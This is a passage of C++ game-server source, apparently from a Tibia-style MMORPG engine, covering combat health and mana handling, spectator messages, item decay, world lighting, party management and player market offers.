targetPlayer = target->getPlayer(); if (attackerPlayer && targetPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_HEALTHCHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeHealthChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeHealth(attacker, target, damage); } } int32_t realHealthChange = target->getHealth(); target->gainHealth(attacker, damage.primary.value); realHealthChange = target->getHealth() - realHealthChange; if (realHealthChange > 0 && !target->isInGhostMode()) { auto damageString = fmt::format("{:d} hitpoint{:s}", realHealthChange, realHealthChange != 1 ? "s" : ""); std::string spectatorMessage; TextMessage message; message.position = targetPos; message.primary.value = realHealthChange; message.primary.color = TEXTCOLOR_PASTELRED; SpectatorVec spectators; map.getSpectators(spectators, targetPos, false, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_HEALED; message.text = fmt::format("You heal {:s} for {:s}.", target->getNameDescription(), damageString); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_HEALED; if (!attacker) { message.text = fmt::format("You were healed for {:s}.", damageString); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You healed yourself for {:s}.", damageString); } else { message.text = fmt::format("You were healed by {:s} for {:s}.", attacker->getNameDescription(), damageString); } } else { message.type = MESSAGE_HEALED_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} was healed for {:s}.", target->getNameDescription(), damageString); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} healed {:s}self for {:s}.", attacker->getNameDescription(), targetPlayer ? (targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "him") : "it", damageString); } else { spectatorMessage = fmt::format("{:s} healed {:s} for {:s}.", attacker->getNameDescription(), target->getNameDescription(), damageString); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } } else { if (!target->isAttackable()) { if (!target->isInGhostMode()) { addMagicEffect(targetPos, CONST_ME_POFF); } return true; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } Player* targetPlayer = target->getPlayer(); if (attackerPlayer && targetPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } damage.primary.value = std::abs(damage.primary.value); damage.secondary.value = std::abs(damage.secondary.value); int32_t healthChange = damage.primary.value + damage.secondary.value; if (healthChange == 0) { return true; } TextMessage message; message.position = targetPos; SpectatorVec spectators; if (targetPlayer && target->hasCondition(CONDITION_MANASHIELD) && damage.primary.type != COMBAT_UNDEFINEDDAMAGE) { int32_t manaDamage = std::min<int32_t>(targetPlayer->getMana(), healthChange); if (manaDamage != 0) { if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } healthChange = damage.primary.value + damage.secondary.value; if (healthChange == 0) { return true; } manaDamage = std::min<int32_t>(targetPlayer->getMana(), healthChange); } } targetPlayer->drainMana(attacker, manaDamage); map.getSpectators(spectators, targetPos, true, true); addMagicEffect(spectators, targetPos, CONST_ME_LOSEENERGY); std::string spectatorMessage; message.primary.value = manaDamage; message.primary.color = TEXTCOLOR_BLUE; for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer->getPosition().z != targetPos.z) { continue; } if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:d} mana due to your attack.", target->getNameDescription(), manaDamage); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:d} mana.", manaDamage); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:d} mana due to your own attack.", manaDamage); } else { message.text = fmt::format("You lose {:d} mana due to an attack by {:s}.", manaDamage, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:d} mana.", target->getNameDescription(), manaDamage); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:d} mana due to {:s} own attack.", target->getNameDescription(), manaDamage, targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "his"); } else { spectatorMessage = fmt::format("{:s} loses {:d} mana due to an attack by {:s}.", target->getNameDescription(), manaDamage, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } damage.primary.value -= manaDamage; if (damage.primary.value < 0) { damage.secondary.value = std::max<int32_t>(0, damage.secondary.value + damage.primary.value); damage.primary.value = 0; } } } int32_t realDamage = damage.primary.value + damage.secondary.value; if (realDamage == 0) { return true; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_HEALTHCHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeHealthChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeHealth(attacker, target, damage); } } int32_t targetHealth = target->getHealth(); if (damage.primary.value >= targetHealth) { damage.primary.value = targetHealth; damage.secondary.value = 0; } else if (damage.secondary.value) { damage.secondary.value = std::min<int32_t>(damage.secondary.value, targetHealth - damage.primary.value); } realDamage = damage.primary.value + damage.secondary.value; if (realDamage == 0) { return true; } if (spectators.empty()) { map.getSpectators(spectators, targetPos, true, true); } message.primary.value = damage.primary.value; message.secondary.value = damage.secondary.value; uint8_t hitEffect; if (message.primary.value) { combatGetTypeInfo(damage.primary.type, target, message.primary.color, hitEffect); if (hitEffect != CONST_ME_NONE) { addMagicEffect(spectators, targetPos, hitEffect); } } if (message.secondary.value) { combatGetTypeInfo(damage.secondary.type, target, message.secondary.color, hitEffect); if (hitEffect != CONST_ME_NONE) { addMagicEffect(spectators, targetPos, hitEffect); } } if (message.primary.color != TEXTCOLOR_NONE || message.secondary.color != TEXTCOLOR_NONE) { auto damageString = fmt::format("{:d} hitpoint{:s}", realDamage, realDamage != 1 ? "s" : ""); std::string spectatorMessage; for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer->getPosition().z != targetPos.z) { continue; } if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:s} due to your attack.", target->getNameDescription(), damageString); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:s}.", damageString); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:s} due to your own attack.", damageString); } else { message.text = fmt::format("You lose {:s} due to an attack by {:s}.", damageString, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:s}.", target->getNameDescription(), damageString); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:s} due to {:s} own attack.", target->getNameDescription(), damageString, targetPlayer ? (targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "his") : "its"); } else { spectatorMessage = fmt::format("{:s} loses {:s} due to an attack by {:s}.", target->getNameDescription(), damageString, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } if (realDamage >= targetHealth) { for (CreatureEvent* creatureEvent : target->getCreatureEvents(CREATURE_EVENT_PREPAREDEATH)) { if (!creatureEvent->executeOnPrepareDeath(target, attacker)) { return false; } } } target->drainHealth(attacker, realDamage); addCreatureHealth(spectators, target); } return true; } bool Game::combatChangeMana(Creature* attacker, Creature* target, CombatDamage& damage) { Player* targetPlayer = target->getPlayer(); if (!targetPlayer) { return true; } int32_t manaChange = damage.primary.value + damage.secondary.value; if (manaChange > 0) { if (attacker) { const Player* attackerPlayer = attacker->getPlayer(); if (attackerPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(target) == SKULL_NONE) { return false; } } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeMana(attacker, target, damage); } } int32_t realManaChange = targetPlayer->getMana(); targetPlayer->changeMana(manaChange); realManaChange = targetPlayer->getMana() - realManaChange; if (realManaChange > 0 && !targetPlayer->isInGhostMode()) { TextMessage message(MESSAGE_HEALED, "You gained " + std::to_string(realManaChange) + " mana."); message.position = target->getPosition(); message.primary.value = realManaChange; message.primary.color = TEXTCOLOR_MAYABLUE; targetPlayer->sendTextMessage(message); } } else { const Position& targetPos = target->getPosition(); if (!target->isAttackable()) { if (!target->isInGhostMode()) { addMagicEffect(targetPos, CONST_ME_POFF); } return false; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } if (attackerPlayer && attackerPlayer->getSkull() == SKULL_BLACK && attackerPlayer->getSkullClient(targetPlayer) == SKULL_NONE) { return false; } int32_t manaLoss = std::min<int32_t>(targetPlayer->getMana(), -manaChange); BlockType_t blockType = target->blockHit(attacker, COMBAT_MANADRAIN, manaLoss); if (blockType != BLOCK_NONE) { addMagicEffect(targetPos, CONST_ME_POFF); return false; } if (manaLoss <= 0) { return true; } if (damage.origin != ORIGIN_NONE) { const auto& events = target->getCreatureEvents(CREATURE_EVENT_MANACHANGE); if (!events.empty()) { for (CreatureEvent* creatureEvent : events) { creatureEvent->executeManaChange(target, attacker, damage); } damage.origin = ORIGIN_NONE; return combatChangeMana(attacker, target, damage); } } targetPlayer->drainMana(attacker, manaLoss); std::string spectatorMessage; TextMessage message; message.position = targetPos; message.primary.value = manaLoss; message.primary.color = TEXTCOLOR_BLUE; SpectatorVec spectators; map.getSpectators(spectators, targetPos, false, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); if (tmpPlayer == attackerPlayer && attackerPlayer != targetPlayer) { message.type = MESSAGE_DAMAGE_DEALT; message.text = fmt::format("{:s} loses {:d} mana due to your attack.", target->getNameDescription(), manaLoss); message.text[0] = std::toupper(message.text[0]); } else if (tmpPlayer == targetPlayer) { message.type = MESSAGE_DAMAGE_RECEIVED; if (!attacker) { message.text = fmt::format("You lose {:d} mana.", manaLoss); } else if (targetPlayer == attackerPlayer) { message.text = fmt::format("You lose {:d} mana due to your own attack.", manaLoss); } else { message.text = fmt::format("You lose {:d} mana due to an attack by {:s}.", manaLoss, attacker->getNameDescription()); } } else { message.type = MESSAGE_DAMAGE_OTHERS; if (spectatorMessage.empty()) { if (!attacker) { spectatorMessage = fmt::format("{:s} loses {:d} mana.", target->getNameDescription(), manaLoss); } else if (attacker == target) { spectatorMessage = fmt::format("{:s} loses {:d} mana due to {:s} own attack.", target->getNameDescription(), manaLoss, targetPlayer->getSex() == PLAYERSEX_FEMALE ? "her" : "his"); } else { spectatorMessage = fmt::format("{:s} loses {:d} mana due to an attack by {:s}.", target->getNameDescription(), manaLoss, attacker->getNameDescription()); } spectatorMessage[0] = std::toupper(spectatorMessage[0]); } message.text = spectatorMessage; } tmpPlayer->sendTextMessage(message); } } return true; } void Game::addCreatureHealth(const Creature* target) { SpectatorVec spectators; map.getSpectators(spectators, target->getPosition(), true, true); addCreatureHealth(spectators, target); } void Game::addCreatureHealth(const SpectatorVec& spectators, const Creature* target) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendCreatureHealth(target); } } } void Game::addMagicEffect(const Position& pos, uint8_t effect) { SpectatorVec spectators; map.getSpectators(spectators, pos, true, true); addMagicEffect(spectators, pos, effect); } void Game::addMagicEffect(const SpectatorVec& spectators, const Position& pos, uint8_t effect) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendMagicEffect(pos, effect); } } } void Game::addDistanceEffect(const Position& fromPos, const Position& toPos, uint8_t effect) { SpectatorVec spectators, toPosSpectators; map.getSpectators(spectators, fromPos, false, true); map.getSpectators(toPosSpectators, toPos, false, true); spectators.addSpectators(toPosSpectators); addDistanceEffect(spectators, fromPos, toPos, effect); } void Game::addDistanceEffect(const SpectatorVec& spectators, const Position& fromPos, const Position& toPos, uint8_t effect) { for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendDistanceShoot(fromPos, toPos, effect); } } } void Game::setAccountStorageValue(const uint32_t accountId, const uint32_t key, const int32_t value) { if (value == -1) { accountStorageMap[accountId].erase(key); return; } accountStorageMap[accountId][key] = value; } int32_t Game::getAccountStorageValue(const uint32_t accountId, const uint32_t key) const { const auto& accountMapIt = accountStorageMap.find(accountId); if (accountMapIt != accountStorageMap.end()) { const auto& storageMapIt = accountMapIt->second.find(key); if (storageMapIt != accountMapIt->second.end()) { return storageMapIt->second; } } return -1; } void Game::loadAccountStorageValues() { Database& db = Database::getInstance(); DBResult_ptr result; if ((result = db.storeQuery("SELECT `account_id`, `key`, `value` FROM `account_storage`"))) { do { g_game.setAccountStorageValue(result->getNumber<uint32_t>("account_id"), result->getNumber<uint32_t>("key"), result->getNumber<int32_t>("value")); } while (result->next()); } } bool Game::saveAccountStorageValues() const { DBTransaction transaction; Database& db = Database::getInstance(); if (!transaction.begin()) { return false; } if (!db.executeQuery("DELETE FROM `account_storage`")) { return false; } for (const auto& accountIt : g_game.accountStorageMap) { if (accountIt.second.empty()) { continue; } DBInsert accountStorageQuery("INSERT INTO `account_storage` (`account_id`, `key`, `value`) VALUES"); for (const auto& storageIt : accountIt.second) { if (!accountStorageQuery.addRow(fmt::format("{:d}, {:d}, {:d}", accountIt.first, storageIt.first, storageIt.second))) { return false; } } if (!accountStorageQuery.execute()) { return false; } } return transaction.commit(); } void Game::startDecay(Item* item) { if (!item || !item->canDecay()) { return; } ItemDecayState_t decayState = item->getDecaying(); if (decayState == DECAYING_TRUE) { return; } if (item->getDuration() > 0) { item->incrementReferenceCounter(); item->setDecaying(DECAYING_TRUE); toDecayItems.push_front(item); } else { internalDecayItem(item); } } void Game::internalDecayItem(Item* item) { const ItemType& it = Item::items[item->getID()]; if (it.decayTo != 0) { Item* newItem = transformItem(item, item->getDecayTo()); startDecay(newItem); } else { ReturnValue ret = internalRemoveItem(item); if (ret != RETURNVALUE_NOERROR) { std::cout << "[Debug - Game::internalDecayItem] internalDecayItem failed, error code: " << static_cast<uint32_t>(ret) << ", item id: " << item->getID() << std::endl; } } } void Game::checkDecay() { g_scheduler.addEvent(createSchedulerTask(EVENT_DECAYINTERVAL, std::bind(&Game::checkDecay, this))); size_t bucket = (lastBucket + 1) % EVENT_DECAY_BUCKETS; auto it = decayItems[bucket].begin(), end = decayItems[bucket].end(); while (it != end) { Item* item = *it; if (!item->canDecay()) { item->setDecaying(DECAYING_FALSE); ReleaseItem(item); it = decayItems[bucket].erase(it); continue; } int32_t duration = item->getDuration(); int32_t decreaseTime = std::min<int32_t>(EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS, duration); duration -= decreaseTime; item->decreaseDuration(decreaseTime); if (duration <= 0) { it = decayItems[bucket].erase(it); internalDecayItem(item); ReleaseItem(item); } else if (duration < EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS) { it = decayItems[bucket].erase(it); size_t newBucket = (bucket + ((duration + EVENT_DECAYINTERVAL / 2) / 1000)) % EVENT_DECAY_BUCKETS; if (newBucket == bucket) { internalDecayItem(item); ReleaseItem(item); } else { decayItems[newBucket].push_back(item); } } else { ++it; } } lastBucket = bucket; cleanup(); } void Game::checkLight() { g_scheduler.addEvent(createSchedulerTask(EVENT_LIGHTINTERVAL, std::bind(&Game::checkLight, this))); updateWorldLightLevel(); LightInfo lightInfo = getWorldLightInfo(); for (const auto& it : players) { it.second->sendWorldLight(lightInfo); } } void Game::updateWorldLightLevel() { if (getWorldTime() >= GAME_SUNRISE && getWorldTime() <= GAME_DAYTIME) { lightLevel = ((GAME_DAYTIME - GAME_SUNRISE) - (GAME_DAYTIME - getWorldTime())) * float(LIGHT_CHANGE_SUNRISE) + LIGHT_NIGHT; } else if (getWorldTime() >= GAME_SUNSET && getWorldTime() <= GAME_NIGHTTIME) { lightLevel = LIGHT_DAY - ((getWorldTime() - GAME_SUNSET) * float(LIGHT_CHANGE_SUNSET)); } else if (getWorldTime() >= GAME_NIGHTTIME || getWorldTime() < GAME_SUNRISE) { lightLevel = LIGHT_NIGHT; } else { lightLevel = LIGHT_DAY; } } void Game::updateWorldTime() { g_scheduler.addEvent(createSchedulerTask(EVENT_WORLDTIMEINTERVAL, std::bind(&Game::updateWorldTime, this))); time_t osTime = time(nullptr); tm* timeInfo = localtime(&osTime); worldTime = (timeInfo->tm_sec + (timeInfo->tm_min * 60)) / 2.5f; } void Game::shutdown() { std::cout << "Shutting down..." << std::flush; g_scheduler.shutdown(); g_databaseTasks.shutdown(); g_dispatcher.shutdown(); map.spawns.clear(); raids.clear(); cleanup(); if (serviceManager) { serviceManager->stop(); } ConnectionManager::getInstance().closeAll(); std::cout << " done!" << std::endl; } void Game::cleanup() { //free memory for (auto creature : ToReleaseCreatures) { creature->decrementReferenceCounter(); } ToReleaseCreatures.clear(); for (auto item : ToReleaseItems) { item->decrementReferenceCounter(); } ToReleaseItems.clear(); for (Item* item : toDecayItems) { const uint32_t dur = item->getDuration(); if (dur >= EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS) { decayItems[lastBucket].push_back(item); } else { decayItems[(lastBucket + 1 + dur / 1000) % EVENT_DECAY_BUCKETS].push_back(item); } } toDecayItems.clear(); } void Game::ReleaseCreature(Creature* creature) { ToReleaseCreatures.push_back(creature); } void Game::ReleaseItem(Item* item) { ToReleaseItems.push_back(item); } void Game::broadcastMessage(const std::string& text, MessageClasses type) const { std::cout << "> Broadcasted message: \"" << text << "\"." << std::endl; for (const auto& it : players) { it.second->sendTextMessage(type, text); } } void Game::updateCreatureWalkthrough(const Creature* creature) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); tmpPlayer->sendCreatureWalkthrough(creature, tmpPlayer->canWalkthroughEx(creature)); } } void Game::updateCreatureSkull(const Creature* creature) { if (getWorldType() != WORLD_TYPE_PVP) { return; } SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureSkull(creature); } } void Game::updatePlayerShield(Player* player) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureShield(player); } } void Game::updatePlayerHelpers(const Player& player) { uint32_t creatureId = player.getID(); uint16_t helpers = player.getHelpers(); SpectatorVec spectators; map.getSpectators(spectators, player.getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureHelpers(creatureId, helpers); } } void Game::updateCreatureType(Creature* creature) { const Player* masterPlayer = nullptr; uint32_t creatureId = creature->getID(); CreatureType_t creatureType = creature->getType(); if (creatureType == CREATURETYPE_MONSTER) { const Creature* master = creature->getMaster(); if (master) { masterPlayer = master->getPlayer(); if (masterPlayer) { creatureType = CREATURETYPE_SUMMON_OTHERS; } } } //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); if (creatureType == CREATURETYPE_SUMMON_OTHERS) { for (Creature* spectator : spectators) { Player* player = spectator->getPlayer(); if (masterPlayer == player) { player->sendCreatureType(creatureId, CREATURETYPE_SUMMON_OWN); } else { player->sendCreatureType(creatureId, creatureType); } } } else { for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureType(creatureId, creatureType); } } } void Game::loadMotdNum() { Database& db = Database::getInstance(); DBResult_ptr result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'motd_num'"); if (result) { motdNum = result->getNumber<uint32_t>("value"); } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('motd_num', '0')"); } result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'motd_hash'"); if (result) { motdHash = result->getString("value"); if (motdHash != transformToSHA1(g_config.getString(ConfigManager::MOTD))) { ++motdNum; } } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('motd_hash', '')"); } } void Game::saveMotdNum() const { Database& db = Database::getInstance(); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:d}' WHERE `config` = 'motd_num'", motdNum)); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:s}' WHERE `config` = 'motd_hash'", transformToSHA1(g_config.getString(ConfigManager::MOTD)))); } void Game::checkPlayersRecord() { const size_t playersOnline = getPlayersOnline(); if (playersOnline > playersRecord) { uint32_t previousRecord = playersRecord; playersRecord = playersOnline; for (auto& it : g_globalEvents->getEventMap(GLOBALEVENT_RECORD)) { it.second.executeRecord(playersRecord, previousRecord); } updatePlayersRecord(); } } void Game::updatePlayersRecord() const { Database& db = Database::getInstance(); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:d}' WHERE `config` = 'players_record'", playersRecord)); } void Game::loadPlayersRecord() { Database& db = Database::getInstance(); DBResult_ptr result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'players_record'"); if (result) { playersRecord = result->getNumber<uint32_t>("value"); } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('players_record', '0')"); } } void Game::playerInviteToParty(uint32_t playerId, uint32_t invitedId) { if (playerId == invitedId) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } Player* invitedPlayer = getPlayerByID(invitedId); if (!invitedPlayer || invitedPlayer->isInviting(player)) { return; } if (invitedPlayer->getParty()) { player->sendTextMessage(MESSAGE_INFO_DESCR, fmt::format("{:s} is already in a party.", invitedPlayer->getName())); return; } Party* party = player->getParty(); if (!party) { party = new Party(player); } else if (party->getLeader() != player) { return; } party->invitePlayer(*invitedPlayer); } void Game::playerJoinParty(uint32_t playerId, uint32_t leaderId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* leader = getPlayerByID(leaderId); if (!leader || !leader->isInviting(player)) { return; } Party* party = leader->getParty(); if (!party || party->getLeader() != leader) { return; } if (player->getParty()) { player->sendTextMessage(MESSAGE_INFO_DESCR, "You are already in a party."); return; } party->joinParty(*player); } void Game::playerRevokePartyInvitation(uint32_t playerId, uint32_t invitedId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || party->getLeader() != player) { return; } Player* invitedPlayer = getPlayerByID(invitedId); if (!invitedPlayer || !player->isInviting(invitedPlayer)) { return; } party->revokeInvitation(*invitedPlayer); } void Game::playerPassPartyLeadership(uint32_t playerId, uint32_t newLeaderId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || party->getLeader() != player) { return; } Player* newLeader = getPlayerByID(newLeaderId); if (!newLeader || !player->isPartner(newLeader)) { return; } party->passPartyLeadership(newLeader); } void Game::playerLeaveParty(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || player->hasCondition(CONDITION_INFIGHT)) { return; } party->leaveParty(player); } void Game::playerEnableSharedPartyExperience(uint32_t playerId, bool sharedExpActive) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || (player->hasCondition(CONDITION_INFIGHT) && player->getZone() != ZONE_PROTECTION)) { return; } party->setSharedExperience(player, sharedExpActive); } void Game::sendGuildMotd(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Guild* guild = player->getGuild(); if (guild) { player->sendChannelMessage("Message of the Day", guild->getMotd(), TALKTYPE_CHANNEL_R1, CHANNEL_GUILD); } } void Game::kickPlayer(uint32_t playerId, bool displayEffect) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->kickPlayer(displayEffect); } void Game::playerReportRuleViolation(uint32_t playerId, const std::string& targetName, uint8_t reportType, uint8_t reportReason, const std::string& comment, const std::string& translation) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_events->eventPlayerOnReportRuleViolation(player, targetName, reportType, reportReason, comment, translation); } void Game::playerReportBug(uint32_t playerId, const std::string& message, const Position& position, uint8_t category) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_events->eventPlayerOnReportBug(player, message, position, category); } void Game::playerDebugAssert(uint32_t playerId, const std::string& assertLine, const std::string& date, const std::string& description, const std::string& comment) { Player* player = getPlayerByID(playerId); if (!player) { return; } // TODO: move debug assertions to database FILE* file = fopen("client_assertions.txt", "a"); if (file) { fprintf(file, "----- %s - %s (%s) -----\n", formatDate(time(nullptr)).c_str(), player->getName().c_str(), convertIPToString(player->getIP()).c_str()); fprintf(file, "%s\n%s\n%s\n%s\n", assertLine.c_str(), date.c_str(), description.c_str(), comment.c_str()); fclose(file); } } void Game::playerLeaveMarket(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setInMarket(false); } void Game::playerBrowseMarket(uint32_t playerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } if (it.wareId == 0) { return; } const MarketOfferList& buyOffers = IOMarket::getActiveOffers(MARKETACTION_BUY, it.id); const MarketOfferList& sellOffers = IOMarket::getActiveOffers(MARKETACTION_SELL, it.id); player->sendMarketBrowseItem(it.id, buyOffers, sellOffers); player->sendMarketDetail(it.id); } void Game::playerBrowseMarketOwnOffers(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const MarketOfferList& buyOffers = IOMarket::getOwnOffers(MARKETACTION_BUY, player->getGUID()); const MarketOfferList& sellOffers = IOMarket::getOwnOffers(MARKETACTION_SELL, player->getGUID()); player->sendMarketBrowseOwnOffers(buyOffers, sellOffers); } void Game::playerBrowseMarketOwnHistory(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const HistoryMarketOfferList& buyOffers = IOMarket::getOwnHistory(MARKETACTION_BUY, player->getGUID()); const HistoryMarketOfferList& sellOffers = IOMarket::getOwnHistory(MARKETACTION_SELL, player->getGUID()); player->sendMarketBrowseOwnHistory(buyOffers, sellOffers); } void Game::playerCreateMarketOffer(uint32_t playerId, uint8_t type, uint16_t spriteId, uint16_t amount, uint32_t price, bool anonymous) { if (amount == 0 || amount > 64000) { return; } if (price == 0 || price > 999999999) { return; } if (type != MARKETACTION_BUY && type != MARKETACTION_SELL) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } if (g_config.getBoolean(ConfigManager::MARKET_PREMIUM) && !player->isPremium()) { player->sendMarketLeave(); return; } const ItemType& itt = Item::items.getItemIdByClientId(spriteId); if (itt.id == 0 || itt.wareId == 0) { return; } const ItemType& it = Item::items.getItemIdByClientId(itt.wareId); if (it.id == 0 || it.wareId == 0) { return; } if (!it.stackable && amount > 2000) { return; } const uint32_t maxOfferCount = g_config.getNumber(ConfigManager::MAX_MARKET_OFFERS_AT_A_TIME_PER_PLAYER); if (maxOfferCount != 0 && IOMarket::getPlayerOfferCount(player->getGUID()) >= maxOfferCount) { return; } uint64_t fee = (price / 100.) * amount; if (fee < 20) { fee = 20; } else if (fee > 1000) { fee = 1000; } if (type == MARKETACTION_SELL) { if (fee > (player->getMoney() + player->bankBalance)) { return; } DepotChest* depotChest = player->getDepotChest(player->getLastDepotId(), false); if (!depotChest) { return; } std::forward_list<Item*> itemList = getMarketItemList(it.wareId, amount, depotChest, player->getInbox()); if (itemList.empty()) { return; } if (it.stackable) { uint16_t tmpAmount = amount; for (Item* item : itemList) { uint16_t removeCount = std::min<uint16_t>(tmpAmount, item->getItemCount()); tmpAmount -= removeCount; internalRemoveItem(item, removeCount); if (tmpAmount == 0) { break; } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } const auto debitCash = std::min(player->getMoney(), fee); const auto debitBank = fee - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; } else { uint64_t totalPrice = static_cast<uint64_t>(price) * amount; totalPrice += fee; if (totalPrice > (player->getMoney() + player->bankBalance)) { return; } const auto debitCash = std::min(player->getMoney(), totalPrice); const auto debitBank = totalPrice - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; } IOMarket::createOffer(player->getGUID(), static_cast<MarketAction_t>(type), it.id, amount, price, anonymous); player->sendMarketEnter(player->getLastDepotId()); const MarketOfferList& buyOffers = IOMarket::getActiveOffers(MARKETACTION_BUY, it.id); const MarketOfferList& sellOffers = IOMarket::getActiveOffers(MARKETACTION_SELL, it.id); player->sendMarketBrowseItem(it.id, buyOffers, sellOffers); } void Game::playerCancelMarketOffer(uint32_t playerId, uint32_t timestamp, uint16_t counter) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } MarketOfferEx offer = IOMarket::getOfferByCounter(timestamp, counter); if (offer.id == 0 || offer.playerId != 